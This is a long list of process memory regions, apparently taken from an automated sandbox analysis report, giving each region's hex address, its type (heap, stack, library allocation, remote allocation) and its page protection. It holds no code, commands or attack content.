page read and write
1DF10071000
trusted library allocation
page read and write
7FF5144EF000
unkown
page readonly
7DE8000
heap
page read and write
7FF5144EF000
unkown
page readonly
5A6000
heap
page read and write
75E3000
unkown
page readonly
EAAB000
unkown
page read and write
76C3000
unkown
page read and write
938E000
unkown
page read and write
6B79000
heap
page read and write
7FF5146A7000
unkown
page readonly
79F0000
heap
page read and write
44B6000
heap
page read and write
1F1A08B0000
trusted library allocation
page read and write
181C4BC9000
trusted library allocation
page read and write
2C10000
heap
page read and write
6B02000
heap
page read and write
FC63000
heap
page read and write
7FF5147D5000
unkown
page readonly
2740000
unkown
page read and write
7FFEBFA83000
trusted library allocation
page execute and read and write
6D33000
trusted library allocation
page read and write
C8FA000
unkown
page read and write
789C000
unkown
page read and write
7FF514B5E000
unkown
page readonly
5D9000
heap
page read and write
7B6A000
heap
page read and write
23E0000
unkown
page readonly
670C000
stack
page read and write
1C80DD5A000
heap
page read and write
181CCDA9000
heap
page read and write
5F2000
heap
page read and write
9D0000
heap
page read and write
7FFF2E2DA000
unkown
page readonly
7A90000
heap
page read and write
48D6000
heap
page read and write
7D99000
heap
page read and write
181CCE4A000
heap
page read and write
223E988D000
heap
page read and write
1D251BE000
stack
page read and write
7CBE000
heap
page read and write
7FF514A4E000
unkown
page readonly
3B51000
heap
page read and write
181CD490000
trusted library allocation
page read and write
107D8000
heap
page read and write
7FF5146AC000
unkown
page readonly
93ED000
stack
page read and write
4850000
heap
page read and write
7FFF2E2F9000
unkown
page readonly
B368000
stack
page read and write
C6BB000
unkown
page readonly
1FD1C1C8000
trusted library allocation
page read and write
223E7B6E000
heap
page read and write
3304000
heap
page read and write
C6FA000
unkown
page readonly
47B3000
heap
page read and write
7DF446141000
trusted library allocation
page execute read
97BE000
heap
page read and write
3E0000
unkown
page readonly
5E37AF9000
stack
page read and write
E6F6000
unkown
page read and write
2700000
system
page execute and read and write
7C02000
heap
page read and write
1E9DCC90000
heap
page read and write
C5E5000
unkown
page readonly
7B6A000
heap
page read and write
6AC9000
heap
page read and write
C8E3000
unkown
page readonly
1D2513F000
stack
page read and write
7DD7000
heap
page read and write
2700000
system
page execute and read and write
C75B000
unkown
page read and write
7FF514842000
unkown
page readonly
6DF0000
unkown
page readonly
7FFF2E417000
unkown
page readonly
7FF51471F000
unkown
page readonly
7B57000
heap
page read and write
7FFEBFC70000
trusted library allocation
page execute and read and write
23A82CC9000
heap
page read and write
FAFC000
heap
page read and write
4918000
heap
page read and write
2340000
unkown
page read and write
218C823C000
heap
page read and write
7A16000
heap
page read and write
F6E9000
heap
page read and write
A86B000
stack
page read and write
24204C50000
heap
page read and write
41A0000
heap
page read and write
FCEE000
heap
page read and write
7ACF000
heap
page read and write
E2A2000
unkown
page read and write
286F000
trusted library allocation
page read and write
16ABBBBA000
heap
page read and write
75FC000
unkown
page read and write
7DE4000
heap
page read and write
CE45000
unkown
page readonly
7CC8000
heap
page read and write
20F8C252000
heap
page read and write
7B6A000
heap
page read and write
1D78565D000
heap
page read and write
4720000
heap
page read and write
287F000
heap
page read and write
1FD1B781000
trusted library allocation
page read and write
3F50000
unkown
page read and write
16ABBB3C000
heap
page read and write
181CCDC5000
heap
page read and write
7DCA000
heap
page read and write
7CDA000
heap
page read and write
CD4E000
unkown
page readonly
7FFF2E3B0000
unkown
page read and write
7DF446140000
trusted library allocation
page readonly
AB1CDFF000
stack
page read and write
1FD1B000000
trusted library allocation
page read and write
C660000
unkown
page read and write
7227000
unkown
page readonly
F883000
heap
page read and write
181CD400000
trusted library allocation
page read and write
7FF514AA2000
unkown
page readonly
1E9DD796000
heap
page read and write
7FF514BB6000
unkown
page readonly
20F8C24F000
heap
page read and write
7C84000
heap
page read and write
2B30000
unkown
page readonly
445F000
heap
page read and write
7CDA000
heap
page read and write
763BE3E000
stack
page read and write
76A5000
unkown
page read and write
F8E9000
heap
page read and write
7FFEBFD40000
trusted library allocation
page read and write
23A9CEF0000
trusted library allocation
page read and write
DF5293D000
stack
page read and write
27B7000
unkown
page read and write
CAC7000
unkown
page readonly
76E5000
stack
page read and write
1C80BDB0000
heap
page read and write
CB85000
unkown
page readonly
7DC6000
heap
page read and write
763BA7E000
stack
page read and write
4D90000
unkown
page read and write
7B52000
heap
page read and write
7FFEBFD80000
trusted library allocation
page read and write
22E1B428000
heap
page read and write
F8D9000
heap
page read and write
23A82D04000
heap
page read and write
97C4000
heap
page read and write
C22A000
stack
page read and write
7D72000
heap
page read and write
58B0000
unkown
page read and write
6D05000
trusted library allocation
page read and write
7DC5000
heap
page read and write
7DCA000
heap
page read and write
83B1000
unkown
page read and write
7BDB000
heap
page read and write
7FFEBFD50000
trusted library allocation
page read and write
2E6C000
trusted library allocation
page read and write
ACE9000
stack
page read and write
181CCFC0000
trusted library allocation
page read and write
7AC5000
heap
page read and write
1F1A08D0000
remote allocation
page read and write
8231000
unkown
page read and write
3E0D000
trusted library allocation
page read and write
3304000
heap
page read and write
181CD500000
trusted library allocation
page read and write
7FF5149E7000
unkown
page readonly
710000
heap
page read and write
70C0000
trusted library allocation
page read and write
8FED000
stack
page read and write
6D40000
trusted library allocation
page read and write
7FFEBFB40000
trusted library allocation
page execute and read and write
1D250BF000
stack
page read and write
4280000
unkown
page readonly
7B57000
heap
page read and write
DF12000
heap
page read and write
24204C51000
heap
page read and write
7FF514B74000
unkown
page readonly
1D7857A0000
trusted library allocation
page read and write
7C1B000
heap
page read and write
7FF514BFC000
unkown
page readonly
24204C80000
heap
page read and write
2811000
heap
page read and write
7B0000
remote allocation
page read and write
7DF415A91000
unkown
page execute read
FC77000
heap
page read and write
3270000
trusted library allocation
page read and write
16AD3E00000
trusted library allocation
page read and write
753E000
unkown
page readonly
7FF514668000
unkown
page readonly
7E53000
heap
page read and write
88AB17B000
stack
page read and write
1DF7B360000
trusted library allocation
page read and write
6EE0000
trusted library allocation
page read and write
A560000
unkown
page read and write
75F7000
unkown
page readonly
2B19000
heap
page read and write
279F000
heap
page read and write
9E0000
unkown
page readonly
181CD510000
trusted library allocation
page read and write
181CCDE0000
heap
page read and write
2B2C000
heap
page read and write
7E5F000
heap
page read and write
640000
unkown
page readonly
2213000
heap
page read and write
820A000
unkown
page read and write
7FF514BB4000
unkown
page readonly
7FF514B25000
unkown
page readonly
6CB0000
trusted library allocation
page read and write
7B5B000
heap
page read and write
680000
unkown
page readonly
629C000
stack
page read and write
C5FF000
unkown
page readonly
181CCFE0000
trusted library allocation
page read and write
223E993D000
heap
page read and write
181CCDB5000
heap
page read and write
7D5E000
heap
page read and write
7DD4000
heap
page read and write
48A6000
heap
page read and write
7C6A000
heap
page read and write
7F91000
unkown
page read and write
DAF0000
unkown
page read and write
7FF51471A000
unkown
page readonly
7B4B000
heap
page read and write
1E9DD76D000
heap
page read and write
7FF5146E9000
unkown
page readonly
4944000
unkown
page read and write
C0AB000
stack
page read and write
A86B000
stack
page read and write
7A90000
heap
page read and write
23A82D7C000
heap
page read and write
550000
heap
page read and write
E7EE000
unkown
page read and write
68B7AB7000
stack
page read and write
7FF51481F000
unkown
page readonly
20A4185D000
heap
page read and write
2D47000
stack
page read and write
536C000
unkown
page read and write
7D30000
heap
page read and write
7D36000
heap
page read and write
6EE0000
trusted library allocation
page read and write
7FFF2E2BC000
unkown
page read and write
7FF514AC7000
unkown
page readonly
7FF51464B000
unkown
page readonly
8755000
stack
page read and write
7FFF29450000
unkown
page readonly
20A4175D000
heap
page read and write
2819000
unkown
page read and write
48A4000
heap
page read and write
75F0000
unkown
page readonly
488F000
heap
page read and write
2B20000
unkown
page read and write
4140000
unkown
page read and write
7B91000
heap
page read and write
480000
heap
page read and write
7FFF2E2C0000
unkown
page read and write
C692000
unkown
page readonly
C8CE000
unkown
page readonly
7AE2000
heap
page read and write
F905000
heap
page read and write
763B4F5000
stack
page read and write
4121000
unkown
page read and write
CD7C000
unkown
page read and write
16ABC965000
trusted library allocation
page read and write
29B0000
trusted library allocation
page read and write
7FF514C9E000
unkown
page readonly
218C8302000
heap
page read and write
9E97000
unkown
page readonly
8A0E000
unkown
page read and write
6B93000
heap
page read and write
1C0000
heap
page read and write
5AD000
heap
page read and write
70B0000
trusted library allocation
page read and write
9791000
heap
page read and write
1DF78FFC000
heap
page read and write
4130000
unkown
page read and write
7DD9000
heap
page read and write
1F19AFD0000
heap
page read and write
F8EF000
heap
page read and write
181CCBB2000
heap
page read and write
7806000
stack
page read and write
1FD335CD000
heap
page read and write
3482000
heap
page read and write
280D000
heap
page read and write
7DE4000
heap
page read and write
DD6E000
stack
page read and write
2AD0000
heap
page read and write
3B51000
heap
page read and write
7FF514AA2000
unkown
page readonly
1DF7A8B0000
heap
page readonly
CB68000
unkown
page readonly
1F19B056000
heap
page read and write
46B0000
unkown
page readonly
7E8C000
heap
page read and write
DFE000
stack
page read and write
97C0000
unkown
page readonly
7FFEBFDD0000
trusted library allocation
page read and write
218C8110000
heap
page read and write
7FFF2E2BC000
unkown
page read and write
5367000
unkown
page read and write
26D8000
stack
page read and write
72DE000
unkown
page readonly
1D7855E0000
trusted library allocation
page read and write
16AD3E2C000
heap
page read and write
7B4F000
heap
page read and write
7FF514B5B000
unkown
page readonly
906000
heap
page read and write
951728F000
stack
page read and write
23A9CEF0000
trusted library allocation
page read and write
66B0000
trusted library allocation
page read and write
48AE000
heap
page read and write
7FF514C95000
unkown
page readonly
F90D000
heap
page read and write
223E7C2A000
heap
page read and write
265A000
stack
page read and write
181CCDC5000
heap
page read and write
CE99000
unkown
page readonly
7FF5146EB000
unkown
page readonly
6AAC000
heap
page read and write
7FFEBFC5D000
trusted library allocation
page read and write
710000
unkown
page read and write
201E000
stack
page read and write
7FF51477E000
unkown
page readonly
3304000
heap
page read and write
181CCFA0000
trusted library allocation
page read and write
7CEC000
stack
page read and write
10B15000
heap
page read and write
7FF514679000
unkown
page readonly
181CCC0C000
heap
page read and write
6AD8000
heap
page read and write
7FFF29451000
unkown
page execute read
7FFEBFDB0000
trusted library allocation
page read and write
7FF514ABA000
unkown
page readonly
4010000
trusted library section
page read and write
7B81000
heap
page read and write
7FF514B39000
unkown
page readonly
7A98000
heap
page read and write
A7EC000
stack
page read and write
193F2870000
heap
page read and write
FC74000
heap
page read and write
1F1A0791000
trusted library allocation
page read and write
7E5C000
heap
page read and write
2890000
unkown
page readonly
4D26000
stack
page read and write
7DDB000
heap
page read and write
90ED000
stack
page read and write
7FF51467D000
unkown
page readonly
EF7B000
unkown
page read and write
7C23000
heap
page read and write
C3CB000
stack
page read and write
7CEF000
heap
page read and write
27F7000
unkown
page read and write
7FF514A04000
unkown
page readonly
2100000
heap
page read and write
604000
heap
page read and write
A275000
unkown
page readonly
27ED000
unkown
page read and write
CB7E000
unkown
page readonly
7619000
unkown
page readonly
1DF7AFA5000
heap
page read and write
10B0E000
heap
page read and write
7D4D000
heap
page read and write
44BF000
heap
page read and write
7DF2000
heap
page read and write
690000
unkown
page read and write
7FFEBFC3D000
trusted library allocation
page read and write
1DF7A8C0000
trusted library allocation
page read and write
F8F3000
heap
page read and write
16AD3DF0000
trusted library allocation
page read and write
44B6000
heap
page read and write
7E08000
heap
page read and write
DF529BF000
stack
page read and write
7FF5144B8000
unkown
page readonly
426F000
heap
page read and write
7FF514806000
unkown
page readonly
6DE7000
stack
page read and write
FBDA000
stack
page read and write
156BEC01000
heap
page read and write
7FFEBFC62000
trusted library allocation
page read and write
6B02000
heap
page read and write
1C80DB2C000
heap
page read and write
1FD1C1F3000
trusted library allocation
page read and write
6700000
trusted library allocation
page read and write
C97A000
unkown
page read and write
97AD000
heap
page read and write
FA65000
heap
page read and write
550000
heap
page read and write
223E993A000
heap
page read and write
27C6000
heap
page read and write
7384000
unkown
page readonly
7FF514AA2000
unkown
page readonly
7FFEBFD70000
trusted library allocation
page read and write
FA48000
heap
page read and write
3304000
heap
page read and write
F7AC000
heap
page read and write
1DF00BC1000
trusted library allocation
page read and write
F8DD000
heap
page read and write
1FD3379A000
heap
page read and write
5ED000
heap
page read and write
7189000
stack
page read and write
48A6000
heap
page read and write
6B5E000
heap
page read and write
1F1A0AA6000
heap
page read and write
990000
unkown
page readonly
CA7000
heap
page read and write
97D3000
heap
page read and write
66A8000
stack
page read and write
7BDB000
heap
page read and write
8183000
unkown
page read and write
7FF514AB1000
unkown
page readonly
6D30000
trusted library allocation
page read and write
1F19AF70000
heap
page read and write
275F000
stack
page read and write
7FFEBFC82000
trusted library allocation
page read and write
7B52000
heap
page read and write
7FFEBFD70000
trusted library allocation
page read and write
7FF514C9E000
unkown
page readonly
7E7F000
heap
page read and write
940E000
unkown
page read and write
CE7C000
unkown
page read and write
30E74FE000
stack
page read and write
3304000
heap
page read and write
2589000
stack
page read and write
1FD1AF60000
trusted library allocation
page read and write
7CD0000
heap
page read and write
27EA000
system
page read and write
7FFEBFD50000
trusted library allocation
page read and write
F0EB000
stack
page read and write
23A9CC00000
heap
page read and write
181CCFC0000
trusted library allocation
page read and write
181CCDAD000
heap
page read and write
1E9DD786000
heap
page read and write
6E8B000
stack
page read and write
44BF000
heap
page read and write
51D0000
unkown
page readonly
26B0000
unclassified section
page execute and read and write
23A9CEF1000
trusted library allocation
page read and write
16ABD0D7000
trusted library allocation
page read and write
7C84000
heap
page read and write
F8FF000
heap
page read and write
2835000
heap
page read and write
287A000
heap
page read and write
542E000
stack
page read and write
7B6A000
heap
page read and write
7FF51471A000
unkown
page readonly
7FF514509000
unkown
page readonly
7FFEBFDE0000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
23A9CDD0000
trusted library allocation
page read and write
4479000
heap
page read and write
2B28000
heap
page read and write
7D63000
heap
page read and write
1FD1C56F000
trusted library allocation
page read and write
2310000
unkown
page read and write
800000
heap
page read and write
7DF4000
heap
page read and write
7D6F000
heap
page read and write
223E9A80000
heap
page read and write
E755000
unkown
page read and write
8E8D000
unkown
page read and write
7FF514C9C000
unkown
page readonly
181CD4A0000
trusted library allocation
page read and write
F1EB000
stack
page read and write
7FF514775000
unkown
page readonly
7FFEBFD17000
trusted library allocation
page read and write
16AD3DF0000
trusted library allocation
page read and write
2360000
unkown
page read and write
223E7C05000
heap
page read and write
7B6A000
heap
page read and write
7B11000
heap
page read and write
181B60DD000
trusted library allocation
page read and write
20A418D8000
heap
page read and write
E21B000
unkown
page read and write
763B57E000
stack
page read and write
23A9CC98000
heap
page read and write
7FF514AE8000
unkown
page readonly
16AB9F60000
heap
page read and write
3F0000
unkown
page readonly
7E16000
heap
page read and write
2700000
system
page execute and read and write
2790000
heap
page read and write
57A0000
heap
page read and write
7FFEBFD00000
trusted library allocation
page read and write
7E00000
heap
page read and write
7FF5144E8000
unkown
page readonly
7D17000
heap
page read and write
20A417D0000
heap
page read and write
7F8B000
unkown
page read and write
2E4000
unkown
page read and write
4280000
unkown
page readonly
2B30000
unkown
page readonly
1E9DDBA0000
remote allocation
page read and write
7B1B000
heap
page read and write
7FF51491A000
unkown
page readonly
201E000
stack
page read and write
7A44000
heap
page read and write
7FFEBFCC0000
trusted library allocation
page read and write
7FF514486000
unkown
page readonly
2B10000
unkown
page readonly
6AC5000
heap
page read and write
181B2C2A000
heap
page read and write
7FBD000
unkown
page read and write
193F2A29000
heap
page read and write
B8E4CF9000
stack
page read and write
7FFEBFC90000
trusted library allocation
page read and write
6AC7000
heap
page read and write
488F000
heap
page read and write
C0F0000
unkown
page readonly
20F8CC02000
trusted library allocation
page read and write
7D46000
heap
page read and write
181CCB4A000
heap
page read and write
7DF6000
heap
page read and write
1F19B000000
heap
page read and write
16AD3E38000
heap
page read and write
73F0000
trusted library allocation
page read and write
763C90E000
stack
page read and write
7FF514C12000
unkown
page readonly
5AD000
heap
page read and write
9A92000
unkown
page readonly
2B5B000
heap
page read and write
F8D2000
heap
page read and write
1DF7AF14000
heap
page read and write
434A000
stack
page read and write
768D000
stack
page read and write
7FF514AE8000
unkown
page readonly
7FF4F5B30000
unkown
page readonly
7392000
unkown
page readonly
7DF4000
heap
page read and write
45DE000
stack
page read and write
1DF78F9A000
heap
page read and write
7FF5144B8000
unkown
page readonly
9FAB000
stack
page read and write
C230000
system
page execute and read and write
7DD9000
heap
page read and write
4250000
trusted library allocation
page read and write
10B95000
heap
page read and write
2D47000
stack
page read and write
7FF514C9E000
unkown
page readonly
4567000
unclassified section
page read and write
6AC5000
heap
page read and write
F7DE000
heap
page read and write
7BDB000
heap
page read and write
1FD19470000
heap
page read and write
E26C000
unkown
page read and write
223E98C5000
heap
page read and write
223E9981000
heap
page read and write
193F2B13000
heap
page read and write
There are 6889 hidden memdumps, click here to show them.